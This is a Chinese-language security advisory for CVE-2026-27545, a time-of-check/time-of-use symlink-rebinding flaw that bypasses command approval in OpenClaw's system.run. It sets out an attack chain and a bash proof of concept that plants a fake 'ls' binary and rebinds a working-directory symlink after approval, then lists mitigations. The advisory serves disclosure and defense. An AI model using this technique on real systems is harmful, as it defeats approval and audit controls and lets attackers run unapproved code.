CVE-2026-27545 OpenClaw system.run 批准绕过漏洞

漏洞信息

漏洞编号

CVE-2026-27545

漏洞类型

权限绕过/符号链接攻击

CVSS评分

6.1 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw是一款自动化任务执行工具，其system.run功能存在批准绕过漏洞。攻击者利用符号链接竞态条件，在命令执行批准后、实际执行前的时间窗口内，通过修改当前工作目录中的可写父级符号链接，将命令执行重定向到攻击者控制的任意位置。该漏洞允许低权限攻击者在本地环境中绕过安全批准机制，执行来自非预期文件系统位置的命令，同时保持工作目录字符串不变，从而绕过安全审计和访问控制。CVSS评分6.1，属于中等严重程度，但可能造成完整性破坏。

技术细节

该漏洞属于TOCTOU(Time-of-check to Time-of-use)竞态条件漏洞。漏洞原理如下：1)system.run在批准时验证命令路径是否在允许的白名单目录内；2)批准后、实际执行前，攻击者利用当前工作目录中的可写符号链接；3)通过在批准后重新绑定符号链接，将工作目录指向攻击者控制的目录；4)system.run执行时读取的是重新绑定后的恶意路径，但显示的工作目录字符串保持不变。攻击者需要具备对当前工作目录的写权限，且目录中存在可修改的符号链接。成功利用可导致任意命令执行，绕过安全策略和审计日志。

攻击链分析

STEP 1

1

攻击者获得目标系统的本地访问权限，具备对当前工作目录的写权限

STEP 2

2

在当前目录创建指向合法路径的符号链接，诱使system.run批准命令执行

STEP 3

3

等待管理员批准system.run命令请求

STEP 4

4

批准后、执行前的竞态窗口内，删除原符号链接并重建指向攻击者控制目录的符号链接

STEP 5

5

system.run按计划执行命令，但实际从攻击者控制的恶意目录加载可执行文件

STEP 6

6

恶意代码以被批准的环境上下文执行，成功绕过安全限制和审计日志

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2026-27545 PoC - Symlink Rebinding Attack
# Requirements: Write access to current working directory

# Setup
ATTACK_DIR="/tmp/attacker-controlled"
TARGET_DIR="/tmp/victim"

echo "=== CVE-2026-27545 Symlink Rebinding PoC ==="

# Create attacker controlled directory with malicious binary
mkdir -p "$ATTACK_DIR"
cat > "$ATTACK_DIR/ls" << 'EOF'
#!/bin/bash
echo "[+] Malicious ls executed! Arbitrary code running as: $(whoami)"
id
# Replace with actual malicious payload
EOF
chmod +x "$ATTACK_DIR/ls"

# Create legitimate directory structure
mkdir -p "$TARGET_DIR/legitimate"
cd "$TARGET_DIR"

# Step 1: Create initial symlink (points to legitimate dir)
ln -sfn "$TARGET_DIR/legitimate" current_workdir

# Step 2: Race condition - rebind symlink after approval, before execution
echo "[+] Waiting for approval..."
echo "[!] Attack window: Rebind symlink immediately after approval"

# Simulate approval delay, then rebind
sleep 1
rm current_workdir
ln -sfn "$ATTACK_DIR" current_workdir

echo "[+] Symlink rebinded to: $(readlink current_workdir)"
echo "[+] Working directory appears unchanged, but executing from attacker dir"

# The vulnerable system.run will now execute attacker-controlled binary

影响范围

OpenClaw < 2026.2.26

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)临时禁用system.run功能，使用替代的安全执行机制；2)确保工作目录不可被普通用户写入，移除所有可被修改的符号链接；3)实施强制的命令路径白名单验证，在执行前锁定所有路径组件；4)增加执行前延迟时间窗口，减小竞态条件可利用窗口；5)部署文件完整性监控(FIM)，检测工作目录中符号链接的异常修改行为。